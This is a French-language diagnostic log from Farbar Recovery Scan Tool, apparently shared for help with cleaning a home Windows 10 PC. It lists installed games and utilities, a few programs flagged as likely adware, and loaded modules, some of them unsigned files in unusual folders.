Addition.txt

Document joint : IFfulWJan5y_Addition.txt

Cliquez pour partager vos propres fichiers

Format du document : text/plain

Prévisualisation

Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 05-06-2019 01
Exécuté par Luca (05-06-2019 21:55:26)
Exécuté depuis C:\Users\Luca\Desktop
Windows 10 Home Version 1809 17763.503 (X64) (2018-11-27 21:23:48)
Mode d'amorçage: Normal
==========================================================

==================== Comptes: =============================

Administrateur (S-1-5-21-3183337316-3821782573-710669081-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3183337316-3821782573-710669081-503 - Limited - Disabled)
Invité (S-1-5-21-3183337316-3821782573-710669081-501 - Limited - Disabled)
Luca (S-1-5-21-3183337316-3821782573-710669081-1001 - Administrator - Enabled) => C:\Users\Luca
WDAGUtilityAccount (S-1-5-21-3183337316-3821782573-710669081-504 - Limited - Disabled)

==================== Centre de sécurité ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Programmes installés ======================

(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)

7-Zip 18.05 (HKLM-x32\...\7-Zip) (Version: 18.05 - Igor Pavlov)
7-Zip 19.00 (HKLM-x32\...\{23170F69-40C1-2701-1900-000001000000}) (Version: 19.00.00.0 - Igor Pavlov)
AlphaConsole version 9.9.11.0 (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\{CCCDBFCF-CD8B-4728-915A-DCB71C1118BE}_is1) (Version: 9.9.11.0 - AlphaConsole)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.4.1 - Advanced Micro Devices, Inc.)
Apex Legends (HKLM-x32\...\{D7FBF176-382D-484E-863A-DFD1124A2A1C}) (Version: 1.0.1.0 - Electronic Arts, Inc.)
Avast Antivirus Gratuit (HKLM-x32\...\Avast Antivirus) (Version: 19.5.2378 - AVAST Software)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden
Call of Duty Black Ops 4 (HKLM-x32\...\Call of Duty Black Ops 4) (Version: - Blizzard Entertainment)
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
CloudNet (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Clownfish Voice Changer (HKLM\...\ClownfishVoiceChanger) (Version: - )
Darksiders III The Crucible (HKLM-x32\...\Darksiders III The Crucible_is1) (Version: - )
Discord (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\Discord) (Version: 0.0.305 - Discord Inc.)
DiskProtect9527 version 10.16 (HKLM-x32\...\{BA260FCE-F1C0-42D5-BD87-EB3EDF11252F}_is1) (Version: 10.16 - )
Epic Games Launcher (HKLM-x32\...\{328902CF-CDEF-4124-B1FE-2E4D026C5750}) (Version: 1.1.195.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Far Cry New Dawn (HKLM-x32\...\Uplay Install 5210) (Version: - Ubisoft)
FileZilla Client 3.42.1 (HKLM-x32\...\FileZilla Client) (Version: 3.42.1 - Tim Kosse)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 74.0.3729.169 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Java 8 Update 211 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180211F0}) (Version: 8.0.2110.12 - Oracle Corporation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Microsoft Office Famille et Étudiant 2016 - fr-fr (HKLM\...\HomeStudentRetail - fr-fr) (Version: 16.0.11629.20196 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\OneDriveSetup.exe) (Version: 19.070.0410.0007 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429 (HKLM-x32\...\{80586c77-db42-44bb-bfc8-7aebbb220c00}) (Version: 14.14.26429.4 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{2D1ED4EA-B59D-4665-ACB3-9325872A300D}) (Version: 1.0.4.0 - Mojang)
MorphVOX Pro (HKLM-x32\...\{2a0101fe-5c87-4a07-86a1-aa818daa5389}) (Version: 4.4.77.16840 - Screaming Bee)
MorphVOX Pro (HKLM-x32\...\{F14B768E-0491-4AC5-B16E-4079BC14AB78}) (Version: 4.4.77.16840 - Screaming Bee) Hidden
MSI Afterburner 4.6.0 (HKLM-x32\...\Afterburner) (Version: 4.6.0 - MSI Co., LTD)
NativeDesktopMediaService (HKLM-x32\...\{4CF9B388-78FA-46C3-B409-196FE2CF5F20}) (Version: 3.6.0 - Jetmedia) <==== ATTENTION
No-IP DUC (HKLM-x32\...\NoIPDUC) (Version: 4.1.1 - Vitalwerks Internet Solutions LLC)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.7 - Notepad++ Team)
NVIDIA PhysX (HKLM-x32\...\{B455E95A-B804-439F-B533-336B1635AE97}) (Version: 9.14.0702 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 23.0.2 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-040C-0000-0000000FF1CE}) (Version: 16.0.11629.20196 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.5.40.26928 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
Planet Coaster version 1.3.6.45104 (HKLM\...\Planet Coaster_is1) (Version: 1.3.6.45104 - STEAMPUNKS)
RivaTuner Statistics Server 7.2.1 (HKLM-x32\...\RTSS) (Version: 7.2.1 - Unwinder)
Roblox Player for Luca (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\roblox-player) (Version: - Roblox Corporation)
Roblox Studio for Luca (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\roblox-studio) (Version: - Roblox Corporation)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs OBS 0.12.3 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 0.12.3 - General Workings, Inc.)
The Forest (HKLM-x32\...\The Forest_is1) (Version: - )
theHunter Launcher (HKLM-x32\...\FBDFBE7F-2DB8-47E2-B88E-32F4A2A74AA8_is1) (Version: 819 - Expansive Worlds)
Twitch (HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Uplay (HKLM-x32\...\Uplay) (Version: 85.0 - Ubisoft)
WinRAR 5.71 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH)
YoutubeAdBlock (HKLM-x32\...\1655C0CA-7AE7-4012-8502-970C8675E5F8) (Version: 2.0.0.868 - Company Inc.) <==== ATTENTION

Packages:
=========
Adblock Plus -> C:\Program Files\WindowsApps\EyeoGmbH.AdblockPlus_0.9.15.0_neutral__d55gg7py3s0m0 [2019-05-01] (eyeo GmbH)
Candy Crush Friends -> C:\Program Files\WindowsApps\king.com.CandyCrushFriends_1.13.5.0_x86__kgqvnymyfvs32 [2019-05-17] (king.com)
Candy Crush Saga -> C:\Program Files\WindowsApps\king.com.CandyCrushSaga_1.1520.1.0_x86__kgqvnymyfvs32 [2019-06-03] (king.com)
Courrier et calendrier -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20174.0_x64__8wekyb3d8bbwe [2019-05-31] (Microsoft Corporation) [MS Ad]
Dolby Access -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAccess_2.4.521.0_x64__rz1tebttyb220 [2019-03-13] (Dolby Laboratories)
Fitbit Coach -> C:\Program Files\WindowsApps\Fitbit.FitbitCoach_4.4.133.0_x64__6mqt6hf9g46tw [2018-11-27] (Fitbit)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_95.1.531.0_x64__v10z8vjag6ke6 [2019-03-19] (HP Inc.)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft News: les actualités à ne pas manquer -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.30.10924.0_x64__8wekyb3d8bbwe [2019-04-04] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.3.4032.0_x86__8wekyb3d8bbwe [2019-04-09] (Microsoft Studios) [MS Ad]
MSN Météo -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.28.10351.0_x64__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.93.375.0_x64__mcm4njqhnhss8 [2019-02-19] (Netflix, Inc.)

==================== Personnalisé CLSID (Avec liste blanche): ==========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

CustomCLSID: HKU\S-1-5-21-3183337316-3821782573-710669081-1001_Classes\CLSID\{9EF3A253-D2B1-4474-B7F5-3B9A82E0E7E4} -> [MEGA] => C:\Users\Luca\Documents\MEGA [2019-06-05 19:37]
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2019-01-27] (Notepad++ -> )
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Luca\AppData\Local\MEGAsync\ShellExtX64.dll [2019-05-30] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2019-03-26] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [Fichier non signé]
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)

==================== Raccourcis & WMI ========================

(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)

ShortcutWithArgument: C:\Users\Luca\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Luca\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic

==================== Modules chargés (Avec liste blanche) ==============

2019-05-25 20:52 - 2019-05-25 20:52 - 085602816 _____ () [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\libcef.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000089600 _____ () [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\libEGL.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 003841536 _____ () [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\libGLESv2.dll
2018-12-24 23:48 - 2018-12-24 23:48 - 098275328 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll
2018-12-24 23:48 - 2018-12-24 23:48 - 000092672 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll
2018-12-24 23:48 - 2018-12-24 23:48 - 003922432 _____ () [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll
2015-07-20 17:34 - 2015-07-20 17:34 - 000073728 _____ () [Fichier non signé] C:\Program Files (x86)\No-IP\ducapi.dll
2015-07-20 17:34 - 2015-07-20 17:34 - 000012288 _____ () [Fichier non signé] C:\Program Files (x86)\No-IP\ducservice.exe
2019-04-30 17:59 - 2019-05-25 09:55 - 000015360 _____ () [Fichier non signé] C:\Program Files (x86)\Origin\libEGL.DLL
2019-04-30 17:59 - 2019-05-25 09:55 - 003090944 _____ () [Fichier non signé] C:\Program Files (x86)\Origin\libGLESv2.dll
2019-06-04 01:07 - 2019-06-04 01:07 - 000048664 _____ () [Fichier non signé] C:\Program Files (x86)\Sanguinis\trixie.exe
2018-03-13 04:47 - 2018-03-13 04:47 - 000912896 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-core.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 003109888 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-s3.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 000817152 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\Device.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 003650560 _____ () [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\Platform.dll
2019-06-04 02:02 - 2019-06-04 02:02 - 000342528 _____ () [Fichier non signé] C:\ProgramData\Quoteex\Sailin.dll
2019-06-04 20:40 - 2019-06-04 20:40 - 001687552 _____ () [Fichier non signé] C:\Windows\xrcrgimbc.xocr
2019-03-26 23:38 - 2019-03-26 23:38 - 000043008 _____ (AMD) [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe
2019-03-26 23:38 - 2019-03-26 23:38 - 000572928 _____ (AMD) [Fichier non signé] C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe
2019-05-25 20:52 - 2019-05-25 20:52 - 001463808 _____ (Firelight Technologies) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\fmod.dll
2019-05-25 20:52 - 2019-05-25 20:52 - 000596992 _____ (The Chromium Authors) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\chrome_elf.dll
2018-12-24 23:48 - 2018-12-24 23:48 - 000547840 _____ (The Chromium Authors) [Fichier non signé] C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll
2019-02-09 20:05 - 2019-02-09 20:05 - 000002560 _____ (The ICU Project) [Fichier non signé] C:\Program Files (x86)\Origin\icudt58.dll
2019-04-30 17:59 - 2019-02-09 20:05 - 001252864 _____ (The ICU Project) [Fichier non signé] C:\Program Files (x86)\Origin\icuuc58.dll
2019-04-30 17:59 - 2019-02-09 20:05 - 001548288 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Fichier non signé] C:\Program Files (x86)\Origin\LIBEAY32.dll
2019-02-09 20:05 - 2019-02-09 20:05 - 000395776 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Fichier non signé] C:\Program Files (x86)\Origin\ssleay32.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000030208 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qgif.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000032768 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qico.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000256512 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000026112 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qtga.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000305152 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000025600 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2019-04-30 17:59 - 2019-05-25 09:55 - 000278016 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\mediaservice\dsengine.dll
2019-02-09 20:05 - 2019-05-25 09:55 - 001611264 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 005487104 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Core.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 005841920 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Gui.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000709120 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Multimedia.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 001179136 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Network.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000207360 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Positioning.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000310272 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5PrintSupport.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 003513344 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Qml.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 003390976 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Quick.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000068096 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5QuickWidgets.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000045568 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5TextToSpeech.dll
2019-06-01 12:06 - 2019-05-25 09:56 - 000116224 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5WebChannel.dll
